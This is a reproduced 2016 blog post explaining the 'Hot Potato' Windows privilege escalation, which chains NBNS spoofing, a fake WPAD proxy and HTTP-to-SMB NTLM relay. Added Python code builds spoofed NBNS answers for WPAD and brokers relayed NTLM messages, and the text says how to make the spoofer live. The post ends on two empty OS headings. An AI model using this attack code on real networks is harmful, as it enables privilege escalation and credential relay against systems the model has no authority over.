Published on January 17th, 2016
Hot Potato — Windows Privilege Escalation
Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012 … and a new network attack
Hot Potato (aka: Potato) takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing. Using this technique, we can elevate our privilege on a Windows workstation from the lowest levels to “NT AUTHORITY\SYSTEM” – the highest level of privilege available on a Windows machine.
This matters because many organizations unfortunately rely on Windows account privileges to protect their corporate network. Once an attacker gains highly privileged access to ANY workstation or server on a Windows network, that access can usually be turned into lateral movement and the compromise of other hosts in the same domain. As attackers, we often first get onto a computer through a low-privilege user or service account, so obtaining high-privilege access on that host is a critical step in a penetration test; it is usually done in an ad-hoc manner, as there are no known public exploits or techniques that do it reliably.
The techniques that this exploit uses to gain privilege escalation aren’t new, but the way they are combined is. Microsoft is aware of all of these issues and has been for some time (circa 2000). These are unfortunately hard to fix without breaking backward compatibility and have been leveraged by attackers for over 15 years.
The exploit consists of 3 main parts, all of which are somewhat configurable through command-line switches. Each part corresponds to an already well known attack that has been in use for years:
Local NBNS Spoofer
NBNS (NetBIOS Name Service) is a broadcast UDP protocol (port 137) for name resolution that is still commonly used in Windows environments. Because a broadcast query can be answered by any host, a spoofer that replies first, echoing the query's transaction ID, decides what the name resolves to.
Fake WPAD Proxy Server
In Windows, Internet Explorer by default automatically tries to detect proxy settings by requesting the URL "http://wpad/wpad.dat". Whoever the name "wpad" resolves to therefore gets to hand the victim a proxy configuration, and a configuration that points at the attacker's listener routes the victim's subsequent HTTP traffic through it.
HTTP -> SMB NTLM Relay
NTLM is part of the Windows Integrated Authentication suite and is essentially a challenge-response design: the client sends a negotiate message, the server replies with a challenge, and the client returns a response computed from its credentials. A man-in-the-middle that receives these messages over HTTP can forward them unchanged to an SMB server and relay the SMB server's challenge back to the client, so the victim ends up authenticating the attacker's SMB session.
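To make the NBNS part concrete, here is an added Python example (not code from the original post or from the Potato tool) that builds an NBNS name query for WPAD, parses it the way a spoofer would, and crafts the positive response that points the name at an address of the attacker's choosing. The name encoding, flag values and record layout follow RFC 1001/1002; the target name "WPAD", the transaction IDs and the answer address are constructed sample values.

```python
import socket
import struct

NBNS_PORT = 137          # NBNS runs over UDP/137
QTYPE_NB = 0x0020        # NB (NetBIOS general name service) record type
QCLASS_IN = 0x0001


def encode_nb_name(name, suffix=0x00):
    """RFC 1001 first-level encoding: pad the name to 15 bytes, append the
    16th 'suffix' byte that identifies the service (0x00 = workstation),
    then emit each byte as two nibbles added to ASCII 'A'. Wire form is a
    length byte (32), the 32 encoded characters and a NUL: 34 bytes."""
    if len(name) > 15:
        raise ValueError("NetBIOS names are at most 15 characters")
    raw = name.upper().encode("ascii").ljust(15, b" ") + bytes([suffix])
    encoded = bytearray()
    for b in raw:
        encoded.append(ord("A") + (b >> 4))
        encoded.append(ord("A") + (b & 0x0F))
    return b"\x20" + bytes(encoded) + b"\x00"


def decode_nb_name(wire):
    """Inverse of encode_nb_name; returns (name, suffix)."""
    if len(wire) < 34 or wire[0] != 32 or wire[33] != 0:
        raise ValueError("not a first-level encoded NetBIOS name")
    enc = wire[1:33]
    raw = bytes(((enc[i] - 65) << 4) | (enc[i + 1] - 65) for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def build_nbns_query(txid, name, suffix=0x00):
    """NAME QUERY REQUEST: flags 0x0110 = opcode QUERY, recursion desired,
    broadcast; one question and no answer records."""
    header = struct.pack("!HHHHHH", txid, 0x0110, 1, 0, 0, 0)
    return header + encode_nb_name(name, suffix) + struct.pack("!HH", QTYPE_NB, QCLASS_IN)


def parse_nbns_query(pkt):
    """Return (txid, name, suffix) for an NB name query, or None for anything
    else (responses, other opcodes, non-NB questions, truncated packets)."""
    if len(pkt) < 50:
        return None
    txid, flags, qdcount = struct.unpack("!HHH", pkt[:6])
    if (flags & 0x8000) or ((flags >> 11) & 0xF) != 0 or qdcount != 1:
        return None
    try:
        name, suffix = decode_nb_name(pkt[12:46])
    except (ValueError, UnicodeDecodeError):
        return None
    qtype, qclass = struct.unpack("!HH", pkt[46:50])
    if qtype != QTYPE_NB or qclass != QCLASS_IN:
        return None
    return txid, name, suffix


def build_spoofed_response(txid, name, suffix, answer_ip, ttl=165):
    """POSITIVE NAME QUERY RESPONSE: flags 0x8500 = response, authoritative
    answer, recursion desired. Echoing the victim's txid is what makes the
    reply acceptable; RDATA is NB_FLAGS (0 = unique name, B-node) + IPv4."""
    header = struct.pack("!HHHHHH", txid, 0x8500, 0, 1, 0, 0)
    rr = encode_nb_name(name, suffix) + struct.pack("!HHIH", QTYPE_NB, QCLASS_IN, ttl, 6)
    rdata = struct.pack("!H", 0x0000) + socket.inet_aton(answer_ip)
    return header + rr + rdata


def parse_nbns_response(pkt):
    """Return (txid, name, suffix, ip) for a positive name query response."""
    if len(pkt) < 62:
        return None
    txid, flags, _qd, ancount = struct.unpack("!HHHH", pkt[:8])
    if not (flags & 0x8000) or ancount != 1:
        return None
    name, suffix = decode_nb_name(pkt[12:46])
    rtype, rclass, _ttl, rdlen, _nbflags = struct.unpack("!HHIHH", pkt[46:58])
    if rtype != QTYPE_NB or rclass != QCLASS_IN or rdlen != 6:
        return None
    return txid, name, suffix, socket.inet_ntoa(pkt[58:62])


def spoof_if_target(pkt, target="WPAD", answer_ip="127.0.0.1"):
    """The spoofer's decision: answer only NB queries for the target name,
    reusing the victim's transaction id, and stay silent for everything else."""
    parsed = parse_nbns_query(pkt)
    if parsed is None or parsed[1] != target.upper():
        return None
    txid, name, suffix = parsed
    return build_spoofed_response(txid, name, suffix, answer_ip)


if __name__ == "__main__":
    # Constructed sample: a WPAD lookup and the answer a spoofer would send.
    query = build_nbns_query(0x1234, "WPAD")
    print(parse_nbns_response(spoof_if_target(query, answer_ip="127.0.0.1")))
```

The block only builds and parses packets; a live spoofer would bind UDP/137 and send the response back to the querying host. Note that Hot Potato itself does not get to see the victim's query (it runs as a low-privilege user on the same box), so instead of echoing one observed transaction ID it floods responses covering every possible 16-bit transaction ID; the packet layout is the same as above.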
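The relay step described above, as an added example that is not part of the original page or of the Hot Potato code: a minimal HTTP -> SMB relay broker in Python that parses the NTLMSSP message type, lifts the 8-byte ServerChallenge from a CHALLENGE message (offset 24 per MS-NLMP), and translates between the Authorization / WWW-Authenticate header values on the victim's HTTP side and raw blobs on the SMB side. The NTLM messages built here are constructed samples with empty name and target fields; real ones also carry domain, workstation and the NT response, and the relay never needs to touch any of that.

```python
import base64
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NEGOTIATE, CHALLENGE, AUTHENTICATE = 1, 2, 3   # MS-NLMP MessageType values


def ntlm_message_type(blob):
    """Every NTLMSSP message starts with the 8-byte signature followed by a
    little-endian 32-bit MessageType."""
    if len(blob) < 12 or blob[:8] != NTLMSSP_SIGNATURE:
        raise ValueError("not an NTLMSSP message")
    return struct.unpack("<I", blob[8:12])[0]


def server_challenge(type2):
    """The 8-byte ServerChallenge sits at offset 24 of a CHALLENGE_MESSAGE;
    a relay only observes it, it never has to solve it."""
    if ntlm_message_type(type2) != CHALLENGE or len(type2) < 32:
        raise ValueError("not a CHALLENGE_MESSAGE")
    return type2[24:32]


def ntlm_from_http(header_value):
    """Decode the value of an 'Authorization: NTLM <base64>' header."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.upper() != "NTLM" or not token:
        raise ValueError("not an NTLM header value")
    return base64.b64decode(token)


def ntlm_to_http(blob):
    """Encode a blob the way Authorization and WWW-Authenticate both carry it."""
    return "NTLM " + base64.b64encode(blob).decode("ascii")


class HttpToSmbRelay:
    """Broker between a victim HTTP client and an SMB server. The blobs cross
    transports unchanged: NTLM proves the credential, not the channel."""

    def __init__(self):
        self.state = "await_negotiate"
        self.challenge = None

    def from_http(self, authorization_value):
        """Victim -> relay over HTTP. Returns the blob to forward to SMB as-is."""
        blob = ntlm_from_http(authorization_value)
        mtype = ntlm_message_type(blob)
        if self.state == "await_negotiate" and mtype == NEGOTIATE:
            self.state = "await_challenge"
        elif self.state == "await_authenticate" and mtype == AUTHENTICATE:
            self.state = "done"
        else:
            raise ValueError(f"unexpected message type {mtype} in state {self.state}")
        return blob

    def from_smb(self, blob):
        """SMB server -> relay. Returns the WWW-Authenticate value that hands
        the SMB server's own challenge to the victim inside an HTTP 401."""
        if self.state != "await_challenge" or ntlm_message_type(blob) != CHALLENGE:
            raise ValueError("expected a CHALLENGE_MESSAGE from the SMB server")
        self.challenge = server_challenge(blob)
        self.state = "await_authenticate"
        return ntlm_to_http(blob)


# Constructed sample messages (empty name/target fields), enough for the relay
# logic above; real messages carry domain, workstation and the NT response.
def make_negotiate(flags=0xE2088297):
    return NTLMSSP_SIGNATURE + struct.pack("<II", NEGOTIATE, flags) + b"\x00" * 16


def make_challenge(challenge, flags=0xE28A8215):
    if len(challenge) != 8:
        raise ValueError("ServerChallenge is 8 bytes")
    empty_field = struct.pack("<HHI", 0, 0, 56)      # Len, MaxLen, BufferOffset
    return (NTLMSSP_SIGNATURE + struct.pack("<I", CHALLENGE) + empty_field
            + struct.pack("<I", flags) + challenge + b"\x00" * 8   # Reserved
            + empty_field + b"\x00" * 8)                            # TargetInfo, Version


def make_authenticate(flags=0xE2888215):
    return NTLMSSP_SIGNATURE + struct.pack("<I", AUTHENTICATE) + b"\x00" * 48 + struct.pack("<I", flags)


def run_relay_exchange(challenge=bytes.fromhex("0123456789abcdef")):
    """Drive the three legs of one relayed authentication and report what
    crossed in each direction."""
    relay = HttpToSmbRelay()
    leg1 = relay.from_http(ntlm_to_http(make_negotiate()))      # HTTP -> SMB
    leg2 = relay.from_smb(make_challenge(challenge))            # SMB  -> HTTP
    leg3 = relay.from_http(ntlm_to_http(make_authenticate()))   # HTTP -> SMB
    return {"to_smb": [ntlm_message_type(leg1), ntlm_message_type(leg3)],
            "to_http": leg2, "challenge": relay.challenge, "state": relay.state}


if __name__ == "__main__":
    print(run_relay_exchange())
```

In Hot Potato the SMB side of this exchange is the SMB service on the victim host itself, so the relayed session lands on the local machine; the broker above is transport-agnostic and would equally serve a relay to a remote SMB server.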
Windows Server 2008
Windows 8/10/Server 2012